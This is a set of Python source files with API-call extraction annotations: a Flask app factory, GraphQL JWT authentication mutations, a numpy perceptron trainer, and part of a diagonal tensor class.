'datetime.datetime', 'datetime', (['(2009)', '(1)', '(1)'], {}), '(2009, 1, 1)\n', (1982, 1994), False, 'from datetime import datetime\n'), ((2042, 2062), 'datetime.datetime', 'datetime', (['(2009)', '(2)', '(2)'], {}), '(2009, 2, 2)\n', (2050, 2062), False, 'from datetime import datetime\n'), ((2095, 2115), 'datetime.datetime', 'datetime', (['(2009)', '(6)', '(1)'], {}), '(2009, 6, 1)\n', (2103, 2115), False, 'from datetime import datetime\n'), ((2152, 2172), 'datetime.datetime', 'datetime', (['(2008)', '(8)', '(1)'], {}), '(2008, 8, 1)\n', (2160, 2172), False, 'from datetime import datetime\n'), ((2196, 2218), 'datetime.datetime', 'datetime', (['(2008)', '(10)', '(27)'], {}), '(2008, 10, 27)\n', (2204, 2218), False, 'from datetime import datetime\n'), ((2241, 2262), 'datetime.datetime', 'datetime', (['(2013)', '(2)', '(28)'], {}), '(2013, 2, 28)\n', (2249, 2262), False, 'from datetime import datetime\n'), ((2303, 2324), 'datetime.datetime', 'datetime', (['(2011)', '(1)', '(14)'], {}), '(2011, 1, 14)\n', (2311, 2324), False, 'from datetime import datetime\n'), ((2357, 2377), 'datetime.datetime', 'datetime', (['(2009)', '(6)', '(1)'], {}), '(2009, 6, 1)\n', (2365, 2377), False, 'from datetime import datetime\n')]
|
from flask import Flask
def create_app():
app = Flask(__name__)
# register routes with app instead of current_app:
from app.main import bp as main_bp
app.register_blueprint(main_bp)
return app
|
[
"flask.Flask"
] |
[((54, 69), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (59, 69), False, 'from flask import Flask\n')]
|
from calendar import timegm
from django.contrib.auth import get_user_model
from django.contrib.auth.signals import user_logged_in, user_logged_out
from django.db import transaction
import graphene
from graphene.types.generic import GenericScalar
from graphene_django_jwt import signals
from graphene_django_jwt.blacklist import Blacklist
from graphene_django_jwt.decorators import login_required
from graphene_django_jwt.exceptions import JSONRefreshTokenExpired, JSONWebTokenExpired, PermissionDenied
from graphene_django_jwt.models import RefreshToken
from graphene_django_jwt.shortcuts import get_refresh_token, get_token
from graphene_django_jwt.utils import create_refresh_token, get_payload, jwt_encode, jwt_payload
UserModel = get_user_model()
class RevokeAllTokensMutation(graphene.Mutation):
revoked_tokens = graphene.List(graphene.NonNull(graphene.String), required=True)
@login_required
def mutate(self, info, **kwargs):
revoked_tokens = []
for rt in RefreshToken.objects.filter(user_id=info.context.user.id, revoked__isnull=True):
rt.revoke()
revoked_tokens.append(rt.get_token())
return RevokeAllTokensMutation(revoked_tokens=revoked_tokens)
class ObtainJSONWebTokenMutation(graphene.Mutation):
token = graphene.String(required=True)
refresh_token = graphene.String(required=True)
class Arguments:
username = graphene.String(required=True)
password = graphene.String(required=True)
def mutate(self, info, username, password):
user = UserModel.objects.filter(username=username).first()
if user is None:
raise PermissionDenied
if not user.is_active:
raise PermissionDenied
if not user.check_password(password):
raise PermissionDenied
refresh_token = create_refresh_token(user).get_token()
payload = jwt_payload(user, refresh_token=refresh_token)
token = jwt_encode(payload)
user_logged_in.send(sender=ObtainJSONWebTokenMutation, request=info.context, user=user)
return ObtainJSONWebTokenMutation(token=token, refresh_token=refresh_token)
class RefreshMutation(graphene.Mutation):
token = graphene.String(required=True)
payload = GenericScalar(required=True)
refresh_token = graphene.String(required=True)
class Arguments:
refresh_token = graphene.String(required=True)
def mutate(self, info, refresh_token):
refresh_token = get_refresh_token(refresh_token)
if refresh_token.revoked:
raise JSONRefreshTokenExpired
if refresh_token.is_expired():
raise JSONRefreshTokenExpired
refreshed_token = refresh_token.rotate()
payload = jwt_payload(refresh_token.user, refresh_token=refreshed_token.get_token())
token = jwt_encode(payload)
signals.refresh_finished.send(
sender=RefreshToken,
user=refresh_token.user,
request=info.context,
)
return RefreshMutation(token=token, payload=payload, refresh_token=refreshed_token.get_token())
class RevokeMutation(graphene.Mutation):
revoked = graphene.Int(required=True)
class Arguments:
refresh_token = graphene.String(required=True)
def mutate(self, info, refresh_token):
refresh_token = get_refresh_token(refresh_token)
refresh_token.revoke()
return RevokeMutation(revoked=timegm(refresh_token.revoked.timetuple()))
class VerifyMutation(graphene.Mutation):
payload = GenericScalar(required=True)
class Arguments:
token = graphene.String(required=True)
def mutate(self, info, token):
payload = get_payload(token)
if Blacklist.is_blacklisted(payload['refresh_token']):
raise JSONWebTokenExpired
return VerifyMutation(payload=payload)
class LogoutMutation(graphene.Mutation):
success = graphene.Boolean(required=True)
class Arguments:
refresh_token = graphene.String(required=False)
@login_required
def mutate(self, info, refresh_token=None, **kwargs):
if refresh_token:
refresh_token = get_refresh_token(refresh_token)
refresh_token.revoke()
user_logged_out.send(sender=self.__class__, request=info.context, user=info.context.user)
return LogoutMutation(success=True)
class SignUpMutation(graphene.Mutation):
token = graphene.String(required=True)
class Arguments:
password = graphene.String(required=True)
username = graphene.String(required=True)
@transaction.atomic
def mutate(self, info, username, password, **kwargs):
user = UserModel.objects.create_user(
username=username,
password=password,
)
refresh_token = create_refresh_token(user)
token = get_token(
user,
refresh_token=refresh_token.token,
)
user_logged_in.send(sender=user.__class__, request=info.context, user=user)
return SignUpMutation(token=token)
class Mutation(graphene.ObjectType):
jwt_sign_in = ObtainJSONWebTokenMutation.Field(required=True)
jwt_sign_up = SignUpMutation.Field(required=True)
jwt_refresh_token = RefreshMutation.Field(required=True)
jwt_revoke_token = RevokeMutation.Field(required=True)
jwt_verify_token = VerifyMutation.Field(required=True)
jwt_revoke_all_tokens = RevokeAllTokensMutation.Field(required=True)
jwt_logout = LogoutMutation.Field(required=True)
|
[
"graphene.String",
"django.contrib.auth.signals.user_logged_out.send",
"graphene_django_jwt.shortcuts.get_token",
"graphene.NonNull",
"django.contrib.auth.get_user_model",
"graphene_django_jwt.models.RefreshToken.objects.filter",
"graphene_django_jwt.shortcuts.get_refresh_token",
"graphene_django_jwt.utils.jwt_payload",
"graphene.Boolean",
"graphene_django_jwt.utils.get_payload",
"django.contrib.auth.signals.user_logged_in.send",
"graphene.types.generic.GenericScalar",
"graphene_django_jwt.utils.create_refresh_token",
"graphene_django_jwt.signals.refresh_finished.send",
"graphene.Int",
"graphene_django_jwt.utils.jwt_encode",
"graphene_django_jwt.blacklist.Blacklist.is_blacklisted"
] |
[((738, 754), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (752, 754), False, 'from django.contrib.auth import get_user_model\n'), ((1289, 1319), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (1304, 1319), False, 'import graphene\n'), ((1340, 1370), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (1355, 1370), False, 'import graphene\n'), ((2218, 2248), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (2233, 2248), False, 'import graphene\n'), ((2263, 2291), 'graphene.types.generic.GenericScalar', 'GenericScalar', ([], {'required': '(True)'}), '(required=True)\n', (2276, 2291), False, 'from graphene.types.generic import GenericScalar\n'), ((2312, 2342), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (2327, 2342), False, 'import graphene\n'), ((3172, 3199), 'graphene.Int', 'graphene.Int', ([], {'required': '(True)'}), '(required=True)\n', (3184, 3199), False, 'import graphene\n'), ((3547, 3575), 'graphene.types.generic.GenericScalar', 'GenericScalar', ([], {'required': '(True)'}), '(required=True)\n', (3560, 3575), False, 'from graphene.types.generic import GenericScalar\n'), ((3924, 3955), 'graphene.Boolean', 'graphene.Boolean', ([], {'required': '(True)'}), '(required=True)\n', (3940, 3955), False, 'import graphene\n'), ((4433, 4463), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (4448, 4463), False, 'import graphene\n'), ((842, 875), 'graphene.NonNull', 'graphene.NonNull', (['graphene.String'], {}), '(graphene.String)\n', (858, 875), False, 'import graphene\n'), ((997, 1076), 'graphene_django_jwt.models.RefreshToken.objects.filter', 'RefreshToken.objects.filter', ([], {'user_id': 'info.context.user.id', 'revoked__isnull': '(True)'}), '(user_id=info.context.user.id, revoked__isnull=True)\n', (1024, 1076), False, 'from graphene_django_jwt.models import RefreshToken\n'), ((1412, 1442), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (1427, 1442), False, 'import graphene\n'), ((1462, 1492), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (1477, 1492), False, 'import graphene\n'), ((1899, 1945), 'graphene_django_jwt.utils.jwt_payload', 'jwt_payload', (['user'], {'refresh_token': 'refresh_token'}), '(user, refresh_token=refresh_token)\n', (1910, 1945), False, 'from graphene_django_jwt.utils import create_refresh_token, get_payload, jwt_encode, jwt_payload\n'), ((1962, 1981), 'graphene_django_jwt.utils.jwt_encode', 'jwt_encode', (['payload'], {}), '(payload)\n', (1972, 1981), False, 'from graphene_django_jwt.utils import create_refresh_token, get_payload, jwt_encode, jwt_payload\n'), ((1990, 2081), 'django.contrib.auth.signals.user_logged_in.send', 'user_logged_in.send', ([], {'sender': 'ObtainJSONWebTokenMutation', 'request': 'info.context', 'user': 'user'}), '(sender=ObtainJSONWebTokenMutation, request=info.context,\n user=user)\n', (2009, 2081), False, 'from django.contrib.auth.signals import user_logged_in, user_logged_out\n'), ((2389, 2419), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (2404, 2419), False, 'import graphene\n'), ((2488, 2520), 'graphene_django_jwt.shortcuts.get_refresh_token', 'get_refresh_token', (['refresh_token'], {}), '(refresh_token)\n', (2505, 2520), False, 'from graphene_django_jwt.shortcuts import get_refresh_token, get_token\n'), ((2838, 2857), 'graphene_django_jwt.utils.jwt_encode', 'jwt_encode', (['payload'], {}), '(payload)\n', (2848, 2857), False, 'from graphene_django_jwt.utils import create_refresh_token, get_payload, jwt_encode, jwt_payload\n'), ((2866, 2967), 'graphene_django_jwt.signals.refresh_finished.send', 'signals.refresh_finished.send', ([], {'sender': 'RefreshToken', 'user': 'refresh_token.user', 'request': 'info.context'}), '(sender=RefreshToken, user=refresh_token.user,\n request=info.context)\n', (2895, 2967), False, 'from graphene_django_jwt import signals\n'), ((3246, 3276), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (3261, 3276), False, 'import graphene\n'), ((3345, 3377), 'graphene_django_jwt.shortcuts.get_refresh_token', 'get_refresh_token', (['refresh_token'], {}), '(refresh_token)\n', (3362, 3377), False, 'from graphene_django_jwt.shortcuts import get_refresh_token, get_token\n'), ((3614, 3644), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (3629, 3644), False, 'import graphene\n'), ((3699, 3717), 'graphene_django_jwt.utils.get_payload', 'get_payload', (['token'], {}), '(token)\n', (3710, 3717), False, 'from graphene_django_jwt.utils import create_refresh_token, get_payload, jwt_encode, jwt_payload\n'), ((3729, 3779), 'graphene_django_jwt.blacklist.Blacklist.is_blacklisted', 'Blacklist.is_blacklisted', (["payload['refresh_token']"], {}), "(payload['refresh_token'])\n", (3753, 3779), False, 'from graphene_django_jwt.blacklist import Blacklist\n'), ((4002, 4033), 'graphene.String', 'graphene.String', ([], {'required': '(False)'}), '(required=False)\n', (4017, 4033), False, 'import graphene\n'), ((4243, 4337), 'django.contrib.auth.signals.user_logged_out.send', 'user_logged_out.send', ([], {'sender': 'self.__class__', 'request': 'info.context', 'user': 'info.context.user'}), '(sender=self.__class__, request=info.context, user=info\n .context.user)\n', (4263, 4337), False, 'from django.contrib.auth.signals import user_logged_in, user_logged_out\n'), ((4505, 4535), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (4520, 4535), False, 'import graphene\n'), ((4555, 4585), 'graphene.String', 'graphene.String', ([], {'required': '(True)'}), '(required=True)\n', (4570, 4585), False, 'import graphene\n'), ((4812, 4838), 'graphene_django_jwt.utils.create_refresh_token', 'create_refresh_token', (['user'], {}), '(user)\n', (4832, 4838), False, 'from graphene_django_jwt.utils import create_refresh_token, get_payload, jwt_encode, jwt_payload\n'), ((4855, 4905), 'graphene_django_jwt.shortcuts.get_token', 'get_token', (['user'], {'refresh_token': 'refresh_token.token'}), '(user, refresh_token=refresh_token.token)\n', (4864, 4905), False, 'from graphene_django_jwt.shortcuts import get_refresh_token, get_token\n'), ((4949, 5024), 'django.contrib.auth.signals.user_logged_in.send', 'user_logged_in.send', ([], {'sender': 'user.__class__', 'request': 'info.context', 'user': 'user'}), '(sender=user.__class__, request=info.context, user=user)\n', (4968, 5024), False, 'from django.contrib.auth.signals import user_logged_in, user_logged_out\n'), ((4167, 4199), 'graphene_django_jwt.shortcuts.get_refresh_token', 'get_refresh_token', (['refresh_token'], {}), '(refresh_token)\n', (4184, 4199), False, 'from graphene_django_jwt.shortcuts import get_refresh_token, get_token\n'), ((1842, 1868), 'graphene_django_jwt.utils.create_refresh_token', 'create_refresh_token', (['user'], {}), '(user)\n', (1862, 1868), False, 'from graphene_django_jwt.utils import create_refresh_token, get_payload, jwt_encode, jwt_payload\n')]
|
import numpy as np
class layer():
def __init__(self,name,type,nodes_number):
self.name=name
self.type=type
self.nodes_number=nodes_number
self.input_values=np.zeros(shape=(nodes_number,1),dtype=float)##input values of nodes
self.sum_values=np.zeros(shape=(nodes_number,1),dtype=float)##sum values of nodes
self.output_values=np.zeros(shape=(nodes_number,1),dtype=float)##output values of nodes
def set_input_values(self,input):
self.input_values=input
if (self.type=="input"):
self.set_output_values(input)
def set_output_values(self,output):
self.output_values=output
class Model():
def __init__(self,method,input_type,perceptron_rule):
self.method=method##method
self.perceptron_rule=perceptron_rule
self.layers=[]##layers of Model
self.input_type=input_type
"""For Training """
self.Connections_Weight=[]## weight of Connections are stored
self.Connections_Bias=[]##Bias of Connections are stored
self.input_number=0##total input number for training model, using for iteration during epoch state
self.input_length=0##each input's length also output array length
self.input_arr=0##input array
self.output_arr=0##output array
self.output_length=0##output length
def add_layer(self,layer):
self.layers.append(layer)
def create_weight_and_bias_array(self,layer1,layer2,bias):
##create arrays as correspond to connections with layers nodes number
w_array=np.zeros(shape=(layer1.nodes_number,layer2.nodes_number),dtype=float)
self.Connections_Weight.append(w_array)##append to model weight list
b_array=np.full(shape=(layer2.nodes_number),fill_value=float(bias))
self.Connections_Bias.append(b_array)
def set_input_values(self,input_arr,input_number,input_length):
if(type(input_arr)!=np.ndarray):
raise Exception("Type Error: given input aren't ndarray")
input_layer=self.layers[0]
if not(input_length==input_layer.input_values.shape[0]):
raise Exception("input's length and nodes number of input layer aren't matched")
self.input_number=input_number
self.input_length=input_length
self.input_arr=input_arr
def set_output_values(self,output_arr,output_length):
if(type(output_arr)!=np.ndarray):
raise Exception("Type Error: given output aren't ndarray")
output_layer=self.layers[-1]
if not(output_length==output_layer.output_values.shape[0]):
raise Exception("output's length and nodes number of output layer aren't matched")
self.output_length=output_length
self.output_arr=output_arr
def activation_func(self,y_in,th):
y=1.0
if (-th < y_in < th):
y=0
elif (y_in<-th):
y=-1.0
return y
def activation_func_bin(self,y_in,th):
y=1.0
if (y_in < th):
y=0
return y
def default_rule(self,input_arr,out,w_array,b_array,n,j):
for k,inp in enumerate(input_arr):##Update weights
w_array[k][j]=w_array[k][j]+n*out*inp
b_array[j]=b_array[j]+n*out##Update bias value
def delta_rule(self,input_arr,out,w_array,b_array,n,j,y):
for k,inp in enumerate(input_arr):##Update weights
w_array[k][j]=w_array[k][j]+n*(out-y)*inp
b_array[j]=b_array[j]+n*(out-y)##Update bias value
def Feed_Forward_Perceptron(self,input_arr,output_arr,n,th):
#bool=np.full((input_layer.nodes_number,output_layer.nodes_number),False)##boolean matrix for weight values
#while bool.all()!=True:##Until weights for each connections maintaing equation
w_array=self.Connections_Weight[0]
b_array=self.Connections_Bias[0]
y=0
for j,out in enumerate(output_arr):
y_in=0## sum
for i,inp in enumerate(input_arr):
y_in+=inp*w_array[i][j]
y_in+=b_array[j]##bias
if(self.input_type=="binary"):##activation
y=self.activation_func_bin(y_in,th)
elif(self.input_type=="bipolar"):
y=self.activation_func(y_in,th)
if(y!=out):
if self.perceptron_rule == "default":
self.default_rule(input_arr,out,w_array,b_array,n,j)
if self.perceptron_rule == "delta":
self.delta_rule(input_arr,out,w_array,b_array,n,j,y)
def Perceptron(self,learning_rate,epoch,threshold,bias):
iter=0
self.create_weight_and_bias_array(self.layers[0],self.layers[1],bias)#give input and output layer as arguments
acc=[]
while iter!=epoch:
for i in range(self.input_number):
self.Feed_Forward_Perceptron(self.input_arr[i],self.output_arr[i],learning_rate,threshold)
iter+=1
if(iter%1==0):
print("epoch="+str(iter))
accuracy=self.predict(self.input_arr,self.output_arr,map_prediction=False)
acc.append(accuracy)
return acc
#print("!!!Weights Matrix After Training!!!"+str(self.input_length)+"X"+str(self.output_length))
#print(self.Connections_Weight[0])
def train(self,learning_rate,epoch,bias,threshold):#return accuracy value of each epoch
if self.method=="perceptron":
acc=self.Perceptron(learning_rate,epoch,threshold,bias)
return acc
def predict_per_once(self,input,output):##predict a input
w_array=self.Connections_Weight[0]
b_array=self.Connections_Bias[0]
pred_result=np.zeros(shape=(self.output_length),dtype=np.float64)
for j,out in enumerate(output):
y_in=0.0
for i,inp in enumerate(input):
w=w_array[i][j]
y_in+=inp*w_array[i][j]
y_in+=b_array[j]
pred_result[j]=int(y_in)
return pred_result
def Map_Pred_Matrix(self,results):##listing predictions on matrix with pred value as x, real value as y
print("""!!!!!!!!Results Of Prediction Of Given Inputs!!!!!!!!""")
sep=" | "
Letters=["L","A","B","C","D","E","J","K"]
l=sep.join(map(str,Letters))
print("\t"+l)
for i,row in enumerate(results):
print("\t-----------------------------")
x=sep.join(map(str,row))
print("\t"+Letters[i+1]+" | "+x)
def predict(self,inputs,labels,map_prediction):##array that have more than one input as argument
true_result=0
false_result=0
results=[[0 for x in range(self.output_length)] for x in range(self.output_length)]
for i,input in enumerate(inputs):
pred_result=self.predict_per_once(input,labels[i])
pred_class=np.argmax(pred_result)##return index of max value as predicted class
real_class=np.where(labels[i]==1)[0][0]
results[pred_class][real_class]+=1
if pred_class==real_class:
true_result+=1
else:
false_result+=1
if(map_prediction==True):
self.Map_Pred_Matrix(results)
accuracy=float(true_result) / float(true_result+false_result)
print("accuracy=>"+str(accuracy))
return accuracy
|
[
"numpy.where",
"numpy.zeros",
"numpy.argmax"
] |
[((193, 239), 'numpy.zeros', 'np.zeros', ([], {'shape': '(nodes_number, 1)', 'dtype': 'float'}), '(shape=(nodes_number, 1), dtype=float)\n', (201, 239), True, 'import numpy as np\n'), ((285, 331), 'numpy.zeros', 'np.zeros', ([], {'shape': '(nodes_number, 1)', 'dtype': 'float'}), '(shape=(nodes_number, 1), dtype=float)\n', (293, 331), True, 'import numpy as np\n'), ((378, 424), 'numpy.zeros', 'np.zeros', ([], {'shape': '(nodes_number, 1)', 'dtype': 'float'}), '(shape=(nodes_number, 1), dtype=float)\n', (386, 424), True, 'import numpy as np\n'), ((1593, 1664), 'numpy.zeros', 'np.zeros', ([], {'shape': '(layer1.nodes_number, layer2.nodes_number)', 'dtype': 'float'}), '(shape=(layer1.nodes_number, layer2.nodes_number), dtype=float)\n', (1601, 1664), True, 'import numpy as np\n'), ((5735, 5787), 'numpy.zeros', 'np.zeros', ([], {'shape': 'self.output_length', 'dtype': 'np.float64'}), '(shape=self.output_length, dtype=np.float64)\n', (5743, 5787), True, 'import numpy as np\n'), ((6913, 6935), 'numpy.argmax', 'np.argmax', (['pred_result'], {}), '(pred_result)\n', (6922, 6935), True, 'import numpy as np\n'), ((7005, 7029), 'numpy.where', 'np.where', (['(labels[i] == 1)'], {}), '(labels[i] == 1)\n', (7013, 7029), True, 'import numpy as np\n')]
|
import CTL.funcs.xplib as xplib
from CTL.tensorbase.tensorbase import TensorBase
import CTL.funcs.funcs as funcs
# import numpy as np
from copy import deepcopy
from CTL.tensor.leg import Leg
from CTL.tensor.tensor import Tensor
import warnings
class DiagonalTensor(Tensor):
"""
The class for diagonal tensors, inheriting from Tensor
1. A data tensor as 1D-array: the elements on the main diagonal;
2. A set of legs, corresponding to each dimension of the tensor.
3. Other information(degree of freedom, total element number, ...)
Diagonal Tensors: a tensor with only non-zero elements on its main diagonal, e.g., for a 3-dimensional diagonal tensor A, only A_{iii} is non-zero, while A_{123} must be zero.
This class is also used for DiagonalTensorLike, an object that behaves almost the same as DiagonalTensor, but without data.
In the following docstrings we will take the number of elements as $n$, the dimension as $d$, and then make some statements on the time efficiency for some functions.
In other part of docstrings, we will not talk about Tensor and DiagonalTensor separately except for special cases.
Parameters
----------
shape : None or tuple of int, optional
The expected shape of the tensor.
labels : None or tuple of str, optional
The labels to be put for each dimension, if None then automatically generated from lower case letters.
data : None or ndarray or 1D-array of float, optional
The data in the tensor.
If None and the data is needed(not TensorLike), then generated as xplib.xp.random.random_sample.
If shape is given, data does not need to have the same shape as "shape", but the number of elements should be the same.
If 1D-array, then taken as the diagonal elements, can be used for diagonal tensors of any rank.
degreeOfFreedom : None or int, optional
Local degree of freedom for this tensor.
name : None or str, optional
The name of the tensor to create.
legs : None or list of Leg, optional
The legs of this tensor. If None, then automatically generated.
diagonalFlag : bool, default False
Whether this tensor is diagonal tensor or not. Diagonal tensors can behave better in efficiency for tensor contractions, so we deal with them with child class DiagonalTensor, check the details in CTL.tensor.diagonalTensor.
tensorLikeFlag : bool, default False
If True, then the tensor is a "TensorLike": will not contain any data, but behave just like a tensor.
xp : object, default numpy
The numpy-like library for numeric functions.
Attributes
----------
tensorLikeFlag : bool
Whether the tensor is a "TensorLike".
xp : object
The numpy-like library for numeric functions.
diagonalFlag : bool
Whether the tensor is a "DiagonalTensor"
totalSize : int
Total number of components in this tensor.
degreeOfFreedom : int
Number of local degree of freedom. E.g. for Ising Tensor around one spin, it can be 1.
name : None or str
The name of the tensor.
legs : list of Leg
The legs from this tensor, can be "attracted" to another leg to form a bond. If not so, then it is a free leg.
a : ndarray of float
The data of the tensor.
Notes
-----
Please note shape, labels, data and legs: although they are all optional, they need to contain enough(and not contradictory) information for deduce the shape, labels, data and legs for the tensor, the deduction strategy is described below:
For labels: priority is legs = labels, default: auto-generated in order from lowercase letters.
For shape: priority is legs = shape > data.
For legs: priority is legs, default: auto-generated with labels and shape.
For data: priority is data.reshape(shape), default: xplib.xp.random.random_sample(shape).
("For property A, priority is B > C = D > E, default: F" means, A can be deduced from B, C, D, E, so we consider from high priority to low priority. If B exist, then we take the deduced value from B, and change C, D, E if they in some sense compatible with B. Otherwise consider C & D. For values of the same priority, if both of them are provided, then they should be the same. If none of B, C, D, E can deduce A, then generate A with F.)
"checkXXXYYYCompatible" functions will do the above checkings to make the information in the same priority compatible with each other.
"""
def deduceDimension(self, data, labels):
"""
Deduce the dimension of current diagonal tensor from data and labels.
Parameters
----------
data : None or 1D array or ndarray
The data to be put in the diagonal tensor.
labels : None or list of Leg
The labels to be added to the legs of this tensor.
Returns
-------
int
The dimension of the current tensor.
"""
# if the labels is given: then use labels
# otherwise, if data is given(as an ndarray), then we return then len(data.shape)
# otherwise, error
if (data is not None) and (len(data.shape) != 1) and (labels is not None) and ((len(labels) != len(data.shape)) or (len(labels) == 0 and len(data.shape) == 1)):
raise ValueError(funcs.errorMessage(location = "DiagonalTensor.deduceDimension", err = "data {} and labels {} are not compatible.".format(data, labels)))
# what if len(labels) == 0, len(data.shape) == 1?
if (labels is not None):
return len(labels)
elif (data is not None):
# then data must be an numpy array
return len(data.shape)
else:
raise ValueError(funcs.errorMessage(location = "DiagonalTensor.deduceDimension", err = "both data and labels are None."))
# TODO: add the affect of "legs" to the deduction
# the strategy is almost the same as Tensor
# the only difference is that, when we have one integer as shape, and we have dimension: we can give the real shape by repeat for dim times
# deduce strategy:
# we want length and dim
# priority for length: shape > data
# priority for dim: shape > labels > data
# 0. leg exist: the shape is already done
# check if shape of leg is ok for diagonal tensor
# if shape exist: check if shape is ok with shape of leg(integer / tuple)
# if label exist: check if dimension of labels ok with legs
# if data exist: ...
# 1. shape exist: shape can be either an integer, or a n-element tuple
# for int case: deduce dim from labels, then data
# for tuple case: (length, data) is ready
# then check labels: should be either None or len(labels) == dim
# then check data: either None, length-element array, dim-dimensional tensor
# 2. shape not exist: check labels for dim
# then check data for dim(1d array, dim-d array with all equal shapes)
# and generate l from shape of data
# 3. labels not exist: check data for (dim, length)
def checkLegsDiagonalCompatible(self, legs):
"""
Check whether the shape from legs can form a diagonal tensor, with all the indices have the same dimension.
Parameters
----------
legs : list of Leg
Legs of the tensor that already existed before creating the tensor.
Returns
-------
bool
Whether the legs can form a diagonal tensor.
"""
if (len(legs) == 0):
return True
l = legs[0].dim
for leg in legs:
if (leg.dim != l):
return False
return True
def checkShapeDiagonalCompatible(self, shape):
"""
Check whether the shape can form a diagonal tensor, with all the indices have the same dimension.
Parameters
----------
shape : tuple of int
Shape of the tensor that already existed before creating the tensor.
Returns
-------
bool
Whether the legs can form a diagonal tensor.
"""
if (len(shape) == 0):
return True
l = shape[0]
for dim in shape:
if (dim != l):
return False
return True
def checkLegsShapeCompatible(self, legs, shape):
"""
For information, check Tensor.checkLegsShapeCompatible.
"""
if (shape is None):
return True
if (isinstance(shape, int)):
shape = tuple([shape] * len(legs))
if (isinstance(shape, list) or isinstance(shape, tuple)):
shapeList = list(shape)
if (len(shapeList) != len(legs)):
return False
for dim, leg in zip(shapeList, legs):
if (dim != leg.dim):
return False
return True
else:
return False
def checkShapeDataCompatible(self, shape, data):
"""
For information, check Tensor.checkShapeDataCompatible.
"""
# we know shape, and want to see if data is ok
if (data is None):
return True
if (isinstance(shape, int)):
shape = tuple([shape] * len(data.shape))
return ((len(data.shape) == 1) and (len(shape) > 0) and (len(data) == shape[0])) or (funcs.tupleProduct(data.shape) == funcs.tupleProduct(shape))
def generateData(self, shape, data, isTensorLike):
"""
For information, check Tensor.generateData.
Returns
-------
1D-array of float
The data to be saved in this diagonal tensor.
"""
if (isTensorLike):
return None
# print('generating data for data = {}'.format(data))
if (data is None):
data = xplib.xp.ones(shape[0])
# otherwise, data can be 1D-array, or ndarray
elif (len(data.shape) == 1):
data = xplib.xp.copy(data)
else:
l, dim = len(shape), shape[0]
# print('dim = {}, l = {}'.format(dim, l))
# print(xplib.xp.diag_indices(dim, l))
data = xplib.xp.copy(data[xplib.xp.diag_indices(dim, l)])
return data
def deduction(self, legs, data, labels, shape, isTensorLike = False):
"""
For more information, check Tensor.deduction
"""
# in Tensor: the "shape" has the highest priority
# so if the shape is given here, it should be taken
# however, if the shape is given as an integer: then we need to deduce the dimension
# if shape exist: then according to shape(but dim may be deduced)
# otherwise, if labels exist, then dim from labels, and l from data
# otherwise, both dim and l from data
funcName = "DiagonalTensor.deduction"
# first, consider scalar case
if (legs is None) and (labels is None) and (shape == () or ((data is not None) and (data.shape == ()))):
if (data is None) and (not isTensorLike):
data = xplib.xp.array(1.0)
return [], data, [], () # scalar
if (legs is not None):
if (not self.checkLegsDiagonalCompatible(legs = legs)):
raise ValueError(funcs.errorMessage('legs {} cannot be considered as legs for diagonal tensor.'.format(legs), location = funcName))
if (not self.checkLegsLabelsCompatible(legs = legs, labels = labels)):
raise ValueError(funcs.errorMessage('labels {} is not compatible with legs {}'.format(labels, legs), location = funcName))
if (labels is None):
labels = [leg.name for leg in legs]
if (not self.checkLegsShapeCompatible(legs = legs, shape = shape)):
raise ValueError(funcs.errorMessage('shape {} is not compatible with legs {}'.format(shape, legs), location = funcName))
if (shape is None) or (isinstance(shape, int)):
shape = tuple([leg.dim for leg in legs])
if (not self.checkShapeDataCompatible(shape = shape, data = data)):
raise ValueError(funcs.errorMessage('data shape {} is not compatible with required shape {}'.format(data.shape, shape), location = funcName))
elif (shape is not None):
if (isinstance(shape, int)):
dim = self.deduceDimension(data = data, labels = labels)
shape = tuple([shape] * dim)
if (not self.checkShapeDiagonalCompatible(shape = shape)):
raise ValueError(funcs.errorMessage('shape {} cannot be considered as shape for diagonal tensor.'.format(shape), location = funcName))
if (not self.checkShapeLabelsCompatible(shape = shape, labels = labels)):
raise ValueError(funcs.errorMessage('labels {} is not compatible with required shape {}'.format(labels, shape), location = funcName))
if (labels is None):
labels = self.generateLabels(len(shape))
if (not self.checkShapeDataCompatible(shape = shape, data = data)):
raise ValueError(funcs.errorMessage('data shape {} is not compatible with required shape {}'.format(data.shape, shape), location = funcName))
elif (data is not None):
# legs, shape are both None
shape = data.shape
if (not self.checkShapeDiagonalCompatible(shape = shape)):
raise ValueError(funcs.errorMessage('data shape {} cannot be considered as shape for diagonal tensor.'.format(shape), location = funcName))
dim = self.deduceDimension(data = data, labels = labels)
if (len(shape) == 1) and (dim > 1):
shape = tuple([shape[0]] * dim)
if (not self.checkShapeLabelsCompatible(shape = shape, labels = labels)):
raise ValueError(funcs.errorMessage('labels {} is not compatible with required shape {}'.format(labels, shape), location = funcName))
if (labels is None):
labels = self.generateLabels(len(shape))
else:
raise ValueError(funcs.errorMessage("Tensor() cannot accept parameters where legs, shape and data being None simultaneously.", location = funcName))
# elif (shape is not None):
# if (isinstance(shape, int)):
# dim = self.deduceDimension(data, labels)
# l = shape
# else:
# dim = len(shape)
# if (dim == 0) or (not funcs.checkAllEqual(shape)):
# raise ValueError(funcs.errorMessage(location = funcName, err = "shape {} is not valid.".format(shape)))
# l = shape[0]
# # then we need to deduce dimension
# if (labels is not None) and (len(labels) != dim):
# raise ValueError(funcs.errorMessage(location = funcName, err = "number of labels is not the same as dim: {} expected but {} obtained.".format(dim, len(labels))))
# elif (data is not None):
# # data can be either shape, or an array of l
# if (len(data.shape) == 1):
# if (data.shape[0] != l):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data length is not the same as length deduced from shape: {} expected but {} obtained.".format(l, data.shape[0])))
# elif (len(data.shape) != dim) or (data.shape != tuple([l] * dim)):
